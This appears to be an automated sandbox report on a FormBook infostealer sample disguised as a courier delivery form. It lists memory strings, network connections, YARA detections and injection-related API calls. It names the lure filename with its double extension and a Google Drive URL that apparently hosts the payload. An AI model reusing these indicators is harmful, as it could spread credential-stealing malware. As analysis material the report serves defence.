                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000000.1670631490.000000000055C000.00000002.00000001.01000000.00000003.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1673538972.000000007F312000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1770113864.0000000021B64000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002579000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1673538972.000000007F1C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://programania.com/index_ru.htm
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818945720.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1772442909.000000007EBFA000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455010423.0000000000779000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2456357700.0000000004ACC000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282511717.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000036E6C000.00000004.80000000.00040000.00000000.sdmp, dxobknwL.pif.0.drString found in binary or memory: http://www.pmail.com0
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000259D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000256A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy31127I
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.0000000000721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/P0
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download4S
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=downloadq
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1774111386.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=downlo
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: proquota.exe, 00000010.00000002.2455010423.00000000007B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: proquota.exe, 00000010.00000003.2391150893.000000000772F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: proquota.exe, 00000010.00000002.2457969749.000000000776C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: proquota.exe, 00000010.00000002.2456357700.0000000004EB4000.00000004.10000000.00040000.00000000.sdmp, IzFuULsBXSkS.exe, 00000013.00000002.2916952193.0000000002FE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2915059830.0000000037254000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe PID: 6600, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 14.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02948254 NtReadVirtualMemory,0_2_02948254
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029484C4 NtUnmapViewOfSection,0_2_029484C4
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0294DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,0_2_0294DACC
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0294DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_0294DA44
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0294DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0294DBB0
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02948BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02948BB0
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029479B4 NtAllocateVirtualMemory,0_2_029479B4
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02947D00 NtWriteVirtualMemory,0_2_02947D00
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02948BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02948BAE
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029479B2 NtAllocateVirtualMemory,0_2_029479B2
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_0294D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_0294D9F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_0042CB13 NtClose,3_2_0042CB13
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082B60 NtClose,LdrInitializeThunk,3_2_2A082B60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_2A082C70
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_2A082DF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0835C0 NtCreateMutant,LdrInitializeThunk,3_2_2A0835C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082AB0 NtWaitForSingleObject,3_2_2A082AB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082AD0 NtReadFile,3_2_2A082AD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082AF0 NtWriteFile,3_2_2A082AF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082B80 NtQueryInformationFile,3_2_2A082B80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082BA0 NtEnumerateValueKey,3_2_2A082BA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082BE0 NtQueryValueKey,3_2_2A082BE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082BF0 NtAllocateVirtualMemory,3_2_2A082BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082E30 NtWriteVirtualMemory,3_2_2A082E30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082E80 NtReadVirtualMemory,3_2_2A082E80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082EA0 NtAdjustPrivilegesToken,3_2_2A082EA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082EE0 NtQueueApcThread,3_2_2A082EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082F30 NtCreateSection,3_2_2A082F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082F60 NtCreateProcessEx,3_2_2A082F60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082F90 NtProtectVirtualMemory,3_2_2A082F90
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082FA0 NtQuerySection,3_2_2A082FA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082FB0 NtResumeThread,3_2_2A082FB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082FE0 NtCreateFile,3_2_2A082FE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082C00 NtQueryInformationProcess,3_2_2A082C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082C60 NtCreateKey,3_2_2A082C60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082CA0 NtQueryInformationToken,3_2_2A082CA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082CC0 NtQueryVirtualMemory,3_2_2A082CC0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082CF0 NtOpenProcess,3_2_2A082CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082D00 NtSetInformationFile,3_2_2A082D00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082D10 NtMapViewOfSection,3_2_2A082D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082D30 NtUnmapViewOfSection,3_2_2A082D30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082DB0 NtEnumerateKey,3_2_2A082DB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A082DD0 NtDelayExecution,3_2_2A082DD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A084340 NtSetContextThread,3_2_2A084340
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A084650 NtSuspendThread,3_2_2A084650
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0839B0 NtGetContextThread,3_2_2A0839B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A083D10 NtOpenProcessToken,3_2_2A083D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A083D70 NtOpenThread,3_2_2A083D70
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A083010 NtOpenDirectoryObject,3_2_2A083010
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A083090 NtSetValueKey,3_2_2A083090
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_02888254 NtReadVirtualMemory,5_2_02888254
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_028884C4 NtUnmapViewOfSection,5_2_028884C4
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_0288DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,5_2_0288DACC
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_0288DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,5_2_0288DA44
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_02888BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,5_2_02888BB0
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_0288DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,5_2_0288DBB0
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_028879B4 NtAllocateVirtualMemory,5_2_028879B4
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_02887D00 NtWriteVirtualMemory,5_2_02887D00
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_02888BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,5_2_02888BAE
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_028879B2 NtAllocateVirtualMemory,5_2_028879B2
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_0288D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,5_2_0288D9F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E035C0 NtCreateMutant,LdrInitializeThunk,8_2_31E035C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02B60 NtClose,LdrInitializeThunk,8_2_31E02B60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_31E02DF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_31E02C70
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E03090 NtSetValueKey,8_2_31E03090
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E03010 NtOpenDirectoryObject,8_2_31E03010
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E039B0 NtGetContextThread,8_2_31E039B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E03D70 NtOpenThread,8_2_31E03D70
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E03D10 NtOpenProcessToken,8_2_31E03D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E04340 NtSetContextThread,8_2_31E04340
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E04650 NtSuspendThread,8_2_31E04650
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02BE0 NtQueryValueKey,8_2_31E02BE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02BF0 NtAllocateVirtualMemory,8_2_31E02BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02BA0 NtEnumerateValueKey,8_2_31E02BA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02B80 NtQueryInformationFile,8_2_31E02B80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02AF0 NtWriteFile,8_2_31E02AF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02AD0 NtReadFile,8_2_31E02AD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02AB0 NtWaitForSingleObject,8_2_31E02AB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02DD0 NtDelayExecution,8_2_31E02DD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02DB0 NtEnumerateKey,8_2_31E02DB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02D30 NtUnmapViewOfSection,8_2_31E02D30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02D00 NtSetInformationFile,8_2_31E02D00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02D10 NtMapViewOfSection,8_2_31E02D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02CF0 NtOpenProcess,8_2_31E02CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02CC0 NtQueryVirtualMemory,8_2_31E02CC0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02CA0 NtQueryInformationToken,8_2_31E02CA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02C60 NtCreateKey,8_2_31E02C60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02C00 NtQueryInformationProcess,8_2_31E02C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02FE0 NtCreateFile,8_2_31E02FE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02FA0 NtQuerySection,8_2_31E02FA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02FB0 NtResumeThread,8_2_31E02FB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02F90 NtProtectVirtualMemory,8_2_31E02F90
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02F60 NtCreateProcessEx,8_2_31E02F60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02F30 NtCreateSection,8_2_31E02F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02EE0 NtQueueApcThread,8_2_31E02EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02EA0 NtAdjustPrivilegesToken,8_2_31E02EA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02E80 NtReadVirtualMemory,8_2_31E02E80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E02E30 NtWriteVirtualMemory,8_2_31E02E30
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029485DC CreateProcessAsUserW,0_2_029485DC
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_029320C40_2_029320C4
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004189A33_2_004189A3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004028703_2_00402870
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004010E03_2_004010E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_0042F1433_2_0042F143
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_0040496A3_2_0040496A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004101D33_2_004101D3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004032303_2_00403230
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004012C03_2_004012C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_0040E3CA3_2_0040E3CA
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_0040E3D33_2_0040E3D3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004103F33_2_004103F3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_00416B9E3_2_00416B9E
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_00416BA33_2_00416BA3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_0040E5183_2_0040E518
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_0040E5233_2_0040E523
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_004025B03_2_004025B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04EA803_2_2A04EA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10AB403_2_2A10AB40
